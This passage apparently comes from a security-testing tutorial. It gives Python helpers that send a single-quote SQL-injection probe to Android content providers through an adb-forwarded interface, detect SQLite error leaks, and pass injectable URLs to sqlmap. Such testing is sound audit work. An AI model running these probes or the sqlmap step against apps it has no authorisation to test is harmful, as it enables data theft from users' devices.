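    given, so value="5'" reproduces the post's error-triggering request."""
    qs = urllib.parse.urlencode(
        {"a": authority, "path0": path0, "selName": column, "selId": value})
    return f"{BASE}/query?{qs}"


def looks_injectable(body: str) -> bool:
    """True when the provider echoed a SQLite parser error, i.e. the quote
    reached the SQL string unescaped (as in the post's last screenshot)."""
    return any(marker in body for marker in SQL_ERROR_MARKERS)


def probe(authority: str, path0: str, column: str, value: str = "5'") -> bool:
    """Live check against the forwarded interface (needs adb forward and the
    app running); returns True when the response leaks a SQL error."""
    with urllib.request.urlopen(probe_url(authority, path0, column, value)) as resp:
        return looks_injectable(resp.read().decode("utf-8", "replace"))
```

Feed the real /list body to parse_provider_list, walk unprotected(records) and call probe on each authority/table pair; a True result is the point at which to hand the URL to sqlmap as the post suggests.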